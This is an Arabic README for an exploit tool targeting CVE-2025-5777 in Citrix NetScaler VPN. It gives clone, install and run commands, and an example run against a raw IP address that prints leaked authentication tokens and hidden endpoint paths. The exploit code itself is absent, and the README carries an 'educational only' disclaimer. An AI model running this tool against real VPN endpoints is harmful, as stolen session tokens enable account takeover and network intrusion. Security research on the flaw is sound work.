
أداة استغلال قائمة على Async لـ CVE-2025-5777 تكتشف وتستخرج رموز المصادقة المسربة وعناوين IP الداخلية ومسارات نقاط النهاية المخفية من نقاط نهاية Citrix NetScaler VPN الضعيفة.
أداة تعليمية قوية مصممة لتوضيح وتحليل الثغرة الأمنية CVE-2025-5777 التي تؤثر على Citrix NetScaler VPN.
هذا المشروع جزء من مبادرة GO-TO CVE.
⚠️ لأغراض تعليمية فقط. لا تستخدم هذا على الأنظمة التي لا تملكها أو ليس لديك إذن صريح لاختبارها.
يحاول هذا السكريبت اكتشاف واستخراج الرموز الداخلية الحساسة، وعناوين IP الداخلية، ومسارات نقاط النهاية المخفية المكشوفة بواسطة نقاط نهاية Citrix VPN المعرضة للخطر.
تم بناؤه لمساعدة الطلاب وباحثي الأمن وفِرق الاختراق (red teamers) على فهم أفضل لكيفية اكتشاف وتحليل الثغرات الأمنية الواقعية (CVEs).
git clone https://github.com/soltanali0/CVE-2025-5777-Exploit.git
cd CVE-2025-5777-Exploit
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
يتطلب Python 3.8+ اختياري: يمكنك استخدام بيئة افتراضية
python3 exploit.py https://target-vpn.com
--proxy http://127.0.0.1:8080 لتوجيه المرور عبر Burp/SOCKS--silent لإخفاء المخرجات--output result.json لحفظ النتائج بصيغة JSONمثال:
python3 exploit.py https://20.237.190.100 --output leaks.json

[!] Leak analysis:
→ Tokens found: ZWZlNjViZDA4NThj...
→ Paths found: /nf/auth/doLogoff.do, /nf/auth/doEPA.do, /Credential
و

لتجنب استغلال هذه الثغرة الأمنية:
تم إصدار هذه الأداة بشكل صارم لأغراض تعليمية وبحثية قانونية. لا يتحمل المطور أي مسؤولية عن أي إساءة استخدام أو نشاط غير قانوني يتم باستخدام هذا الكود.
باستخدامك لهذه الأداة، فأنت توافق على أن:
انضم إلى مجتمع أبحاث تسريب الثغرات الأمنية (CVE) والاستغلال: 👉 https://t.me/GOTOCVE
تم التطوير بواسطة Ali Soltani – مختبر اختراق (red teamer) وصياد ثغرات (CVE hunter).
بفخر جزء من GO-TO CVE